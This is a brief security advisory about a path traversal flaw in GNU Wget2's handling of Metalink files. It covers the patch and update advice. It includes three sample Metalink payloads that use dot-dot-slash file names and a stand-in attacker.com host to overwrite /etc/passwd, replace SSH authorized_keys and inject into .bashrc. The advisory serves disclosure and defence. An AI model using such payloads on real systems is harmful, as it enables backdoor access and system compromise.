Critical GNU Wget2 flaw allows attackers to overwrite sensitive files
Take action: Update GNU Wget2 to the latest version to fix the path traversal flaw. Until you patch, do not process Metalink files from untrusted sources and run the tool in a restricted sandbox.
Learn More
GNU Wget2 reports a bug that lets attackers overwrite files on your computer. Wget2 is a tool that downloads files from the web.
The bug is CVE-2025-69194 (CVSS score varies between medium and 9.8), a path traversal flaw. Wget2 fails to check the file paths inside Metalink documents, which are lists of download links. Attackers can use "dot-dot-slash" paths to save files to escape the download folder and overwrite system files like /etc/passwd to break logins, replace SSH keys in .ssh/authorized_keys to gain remote access, nject scripts into .bashrc to run malware when you log in or swap system tools with fake versions to steal data.
Attack examples:
<metalink>
<file name="../../../etc/passwd">
<url>http://attacker.com/fake_passwd</url>
</file>
</metalink>Replace User's SSH Keys
<metalink>
<file name="../../.ssh/authorized_keys">
<url>http://attacker.com/backdoor_keys</url>
</file>
</metalink>Inject Startup Scripts
<metalink>
<file name="../../../home/user/.bashrc">
<url>http://attacker.com/malicious_script</url>
</file>
</metalink>Developers patch the tool by adding a check called sanitized_filename. This new code stops paths that start with slashes or dots and blocks empty names. This keeps files inside the right folder and stops them from hitting system roots.
Users should update Wget2 as soon as possible. Do not trust Metalink files from strangers. Check the official repository for the latest code or update from your OS update tool.
